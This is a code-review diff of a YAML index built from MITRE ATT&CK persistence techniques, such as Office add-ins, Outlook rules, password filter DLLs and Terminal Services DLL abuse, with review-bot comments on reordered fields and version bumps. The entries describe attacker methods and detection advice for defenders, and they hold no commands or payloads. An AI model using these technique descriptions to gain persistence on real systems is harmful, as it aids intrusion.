description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
17, 2020.
url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+ - source_name: Hexacorn DLL Hijacking
+ description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+ Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
- source_name: Microsoft Security Advisory 2269637
description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
March 13, 2020.
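Review bot: the new `Hexacorn DLL Hijacking` reference at L71759–L71762 matches the citation key inserted into the description at L71733 exactly, so the citation resolves. The adjacent context at L71764 has a pre-existing malformed citation date `(, May 23)` (missing year) in the Microsoft Security Advisory 2269637 entry; that is upstream ATT&CK data, so report it there rather than patching it in this index.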
@@ -28768,42 +29145,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1574.001
atomic_tests: []
T1137.006:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
- type: attack-pattern
- created: '2019-11-07T19:52:52.801Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.006
- url: https://attack.mitre.org/techniques/T1137/006
- - url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
- description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
- source_name: Microsoft Office Add-ins
- - url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
- description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
- Persistence. Retrieved July 3, 2017.
- source_name: MRWLabs Office Persistence Add-ins
- - source_name: FireEye Mail CDS 2018
- url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
- description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
- Enterprise Email Compromise. Retrieved April 22, 2019.
- - source_name: GlobalDotName Jun 2019
- url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
- description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
- - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:37:09.190Z'
name: 'Office Application Startup: Add-ins'
description: "Adversaries may abuse Microsoft Office add-ins to obtain persistence
on a compromised system. Office add-ins can be used to add functionality to
@@ -28818,13 +29164,18 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Modification'
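Review bot: the references removed at L71790–L71796 had their keys in `url`/`description`/`source_name` order and the re-added copies at L71848–L71862 use `source_name`/`description`/`url`, which is a welcome normalization with unchanged content. The real change for T1137.006 is again the platform rename `Office 365` → `Office Suite` (L71777 vs L71825) and the version bump 1.1 → 1.2 at L71826, so the same per-platform index check as for T1137 applies.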
@@ -28832,11 +29183,34 @@ persistence:
- 'Windows Registry: Windows Registry Key Creation'
- 'Process: Process Creation'
- 'File: File Creation'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
+ created: '2019-11-07T19:52:52.801Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/006
+ external_id: T1137.006
+ - source_name: FireEye Mail CDS 2018
+ description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
+ Enterprise Email Compromise. Retrieved April 22, 2019.
+ url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
+ - source_name: MRWLabs Office Persistence Add-ins
+ description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
+ Persistence. Retrieved July 3, 2017.
+ url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
+ - source_name: Microsoft Office Add-ins
+ description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
+ url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
+ - source_name: GlobalDotName Jun 2019
+ description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+ - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+ url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1137.006
atomic_tests: []
T1505.002:
@@ -28867,7 +29241,7 @@ persistence:
url: https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf
description: 'Faou, M. (2019, May). Turla LightNeuron: One email away from
remote code execution. Retrieved June 24, 2019.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T17:05:44.321Z'
name: 'Server Software Component: Transport Agent'
description: "Adversaries may abuse Microsoft transport agents to establish
persistent access to systems. Microsoft Exchange transport agents can operate
@@ -28905,13 +29279,11 @@ persistence:
- SYSTEM
- Administrator
- root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1505.002
atomic_tests: []
T1574.014:
technique:
- modified: '2024-04-18T15:03:32.158Z'
+ modified: '2024-04-28T15:44:25.342Z'
name: AppDomainManager
description: "Adversaries may execute their own malicious payloads by hijacking
how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -28937,7 +29309,7 @@ persistence:
phase_name: defense-evasion
x_mitre_contributors:
- Thomas B
- - Ivy Bostock
+ - Ivy Drexel
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
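Review bot: the contributor change at L71898–L71899 (Ivy Bostock → Ivy Drexel) is a personal-name update carried over from upstream, not a typo fix; it is easy to misread as one, so a one-line mention in the PR description pointing at the upstream ATT&CK release would avoid a follow-up "revert" PR.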
@@ -28979,7 +29351,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1098.006:
technique:
@@ -29057,11 +29428,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053:
technique:
- modified: '2024-03-01T15:29:46.832Z'
+ modified: '2024-10-15T15:14:03.453Z'
name: Scheduled Task/Job
description: |-
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -29141,35 +29511,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.002:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
- type: attack-pattern
- created: '2020-02-11T19:05:45.829Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.002
- url: https://attack.mitre.org/techniques/T1556/002
- - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
- description: Fuller, R. (2013, September 11). Stealing passwords every time
- they change. Retrieved November 21, 2017.
- source_name: Carnal Ownage Password Filters Sept 2013
- - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
- description: Bialek, J. (2013, September 15). Intercepting Password Changes
- With Function Hooking. Retrieved November 21, 2017.
- source_name: Clymb3r Function Hook Passwords Sept 2013
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T16:16:18.271Z'
name: 'Modify Authentication Process: Password Filter DLL'
description: "Adversaries may register malicious password filter dynamic link
libraries (DLLs) into the authentication process to acquire user credentials
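Review bot: every field removed at the top of T1556.002 in this hunk (`x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `id`, `created`, `created_by_ref`, both citations) is re-added lower in the object in the following hunk, so this block is a reordering rather than a deletion; the only substantive line here is `modified` moving to `'2024-08-21T16:16:18.271Z'`. If the generator can serialise keys in a stable order, future regeneration diffs will be much smaller; a sentence in the commit message saying the layout changed would save reviewers from diffing the citation entries by hand.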
@@ -29193,71 +29538,60 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Creation'
- 'Module: Module Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+ created: '2020-02-11T19:05:45.829Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/002
+ external_id: T1556.002
+ - source_name: Clymb3r Function Hook Passwords Sept 2013
+ description: Bialek, J. (2013, September 15). Intercepting Password Changes
+ With Function Hooking. Retrieved November 21, 2017.
+ url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+ - source_name: Carnal Ownage Password Filters Sept 2013
+ description: Fuller, R. (2013, September 11). Stealing passwords every time
+ they change. Retrieved November 21, 2017.
+ url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.002
atomic_tests: []
T1505.005:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
- created: '2022-03-28T15:34:44.590Z'
- x_mitre_version: '1.0'
- external_references:
- - source_name: mitre-attack
- external_id: T1505.005
- url: https://attack.mitre.org/techniques/T1505/005
- - source_name: James TermServ DLL
- url: https://twitter.com/james_inthe_box/status/1150495335812177920
- description: James. (2019, July 14). @James_inthe_box. Retrieved March 28,
- 2022.
- - source_name: Microsoft System Services Fundamentals
- url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
- description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
- Retrieved March 28, 2022.
- - source_name: Microsoft Remote Desktop Services
- url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
- description: Microsoft. (2019, August 23). About Remote Desktop Services.
- Retrieved March 28, 2022.
- - source_name: RDPWrap Github
- url: https://github.com/stascorp/rdpwrap
- description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
- Retrieved March 28, 2022.
- - source_name: Windows OS Hub RDP
- url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
- description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
- Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-09-12T19:40:42.810Z'
+ name: 'Server Software Component: Terminal Services DLL'
description: |-
Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.(Citation: Microsoft Remote Desktop Services)
[Windows Service](https://attack.mitre.org/techniques/T1543/003)s that are run as a "generic" process (ex: svchost.exe
) load the service's DLL file, the location of which is stored in a Registry entry named ServiceDll
.(Citation: Microsoft System Services Fundamentals) The termsrv.dll
file, typically stored in `%SystemRoot%\System32\`, is the default ServiceDll
value for Terminal Services in `HKLM\System\CurrentControlSet\services\TermService\Parameters\`.
Adversaries may modify and/or replace the Terminal Services DLL to enable persistent access to victimized hosts.(Citation: James TermServ DLL) Modifications to this DLL could be done to execute arbitrary payloads (while also potentially preserving normal termsrv.dll
functionality) as well as to simply enable abusable features of Terminal Services. For example, an adversary may enable features such as concurrent [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) sessions by either patching the termsrv.dll
file or modifying the ServiceDll
value to point to a DLL that provides increased RDP functionality.(Citation: Windows OS Hub RDP)(Citation: RDPWrap Github) On a non-server Windows OS this increased functionality may also enable an adversary to avoid Terminal Services prompts that warn/log out users of a system when a new RDP session is created.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Server Software Component: Terminal Services DLL'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for changes to Registry keys associated with ServiceDll
and other subkey values under HKLM\System\CurrentControlSet\services\TermService\Parameters\
.
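Review bot: T1556.002 loses `x_mitre_permissions_required` (`- Administrator`, `- SYSTEM`) while `x_mitre_version` goes from `'2.0'` to `'2.1'` and `revoked: false` plus `x_mitre_deprecated: false` are added; anything that surfaces required privileges from this index loses that information for the technique, and the two new boolean flags are worth honouring in the index generators by skipping objects where either is true. The remainder of the hunk is key reordering (the `external_references` list is re-emitted with the two citations swapped and `url` placed after `external_id`), which is why it reads as larger than it is. For T1505.005 the hunk deletes and re-adds `modified`, `name` and `created_by_ref` around an unchanged `description` block, again reordering rather than content change.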
@@ -29266,24 +29600,56 @@ persistence:
Monitor commands as well as processes and arguments for potential adversary actions to modify Registry values (ex: reg.exe
) or modify/replace the legitimate termsrv.dll
.
Monitor module loads by the Terminal Services process (ex: svchost.exe -k termsvcs
) for unexpected DLLs (the default is %SystemRoot%\System32\termsrv.dll
, though an adversary could also use [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005) on a malicious payload).
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.0'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Command: Command Execution'
- 'File: File Modification'
- 'Windows Registry: Windows Registry Key Modification'
- 'Process: Process Creation'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
+ created: '2022-03-28T15:34:44.590Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1505/005
+ external_id: T1505.005
+ - source_name: James TermServ DLL
+ description: James. (2019, July 14). @James_inthe_box. Retrieved September
+ 12, 2024.
+ url: https://x.com/james_inthe_box/status/1150495335812177920
+ - source_name: Microsoft System Services Fundamentals
+ description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
+ Retrieved March 28, 2022.
+ url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
+ - source_name: Microsoft Remote Desktop Services
+ description: Microsoft. (2019, August 23). About Remote Desktop Services.
+ Retrieved March 28, 2022.
+ url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
+ - source_name: RDPWrap Github
+ description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
+ Retrieved March 28, 2022.
+ url: https://github.com/stascorp/rdpwrap
+ - source_name: Windows OS Hub RDP
+ description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
+ Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
+ url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1505.005
atomic_tests: []
T1176:
technique:
- modified: '2024-04-18T23:22:37.874Z'
+ modified: '2024-09-12T19:48:15.871Z'
name: Browser Extensions
description: "Adversaries may abuse Internet browser extensions to establish
persistent access to victim systems. Browser extensions or plugins are small
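Review bot: the `James TermServ DLL` reference now points at `https://x.com/james_inthe_box/status/1150495335812177920` with a retrieval date of September 12, 2024, while `Microsoft Remote Desktop Services` in the same list keeps `https://docs.microsoft.com/windows/win32/termserv/about-terminal-services`, even though a later hunk in this patch moves the `AddMonitor` reference to learn.microsoft.com. That is what upstream ATT&CK carries, so mirror upstream rather than hand-edit, but do not expect link consistency from this pass. T1505.005 keeps `x_mitre_version: '1.0'` under a newer `modified`, which is consistent with a citation-only revision.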
@@ -29375,8 +29741,8 @@ persistence:
url: https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf
- source_name: Chrome Extension C2 Malware
description: 'Kjaer, M. (2016, July 18). Malware in the browser: how you might
- get hacked by a Chrome extension. Retrieved November 22, 2017.'
- url: https://kjaer.io/extension-malware/
+ get hacked by a Chrome extension. Retrieved September 12, 2024.'
+ url: https://web.archive.org/web/20240608001937/https://kjaer.io/extension-malware/
- source_name: Catch All Chrome Extension
description: Marinho, R. (n.d.). "Catch-All" Google Chrome Malicious Extension
Steals All Posted Data. Retrieved November 16, 2017.
@@ -29407,71 +29773,139 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1176
atomic_tests: []
T1137.005:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T16:02:26.206Z'
+ name: Outlook Rules
+ description: |-
+ Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
+
+ Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
x_mitre_contributors:
- Microsoft Security
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+
+ Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Application Log: Application Log Content'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
created: '2019-11-07T20:00:25.560Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1137.005
url: https://attack.mitre.org/techniques/T1137/005
- - source_name: SilentBreak Outlook Rules
- url: https://silentbreaksecurity.com/malicious-outlook-rules/
- description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
- February 4, 2019.
+ external_id: T1137.005
+ - source_name: Pfammatter - Hidden Inbox Rules
+ description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
+ Microsoft Exchange. Retrieved October 12, 2021.
+ url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
- source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
4, 2019.
- - source_name: Pfammatter - Hidden Inbox Rules
- url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
- description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
- Microsoft Exchange. Retrieved October 12, 2021.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+ - source_name: SilentBreak Outlook Rules
+ description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
+ February 4, 2019.
+ url: https://silentbreaksecurity.com/malicious-outlook-rules/
- source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
provides blue teams with the ability to detect Ruler usage against Exchange.
Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
- name: Outlook Rules
- description: |-
- Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
-
- Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+ url: https://github.com/sensepost/notruler
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1098.007:
+ technique:
+ modified: '2024-10-14T14:32:08.926Z'
+ name: Additional Local or Domain Groups
+ description: "An adversary may add additional local or domain groups to an adversary-controlled
+ account to maintain persistent access to a system or domain.\n\nOn Windows,
+ accounts may use the `net localgroup` and `net group` commands to add existing
+ users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+ Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+ the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+ added to the local administrators group on Windows devices to maintain elevated
+ privileges. They may also be added to the Remote Desktop Users group, which
+ allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+ to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+ Linux, accounts may be added to the sudoers group, allowing them to persistently
+ leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+ for elevated privileges. \n\nIn Windows environments, machine accounts may
+ also be added to domain groups. This allows the local SYSTEM account to gain
+ privileges on the domain.(Citation: RootDSE AD Detection 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- x_mitre_detection: |-
- Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
-
- Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.0'
x_mitre_data_sources:
- - 'Process: Process Creation'
- - 'Application Log: Application Log Content'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ - 'User Account: User Account Modification'
+ type: attack-pattern
+ id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+ created: '2024-08-05T20:49:49.809Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1098/007
+ external_id: T1098.007
+ - source_name: Linux Usermod
+ description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+ url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+ - source_name: Microsoft Net Group
+ description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+ 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+ - source_name: Microsoft Net Localgroup
+ description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+ 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+ - source_name: Microsoft RDP Logons
+ description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+ Services. Retrieved August 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+ - source_name: RootDSE AD Detection 2022
+ description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+ Active Directory environments. Retrieved August 5, 2024.
+ url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
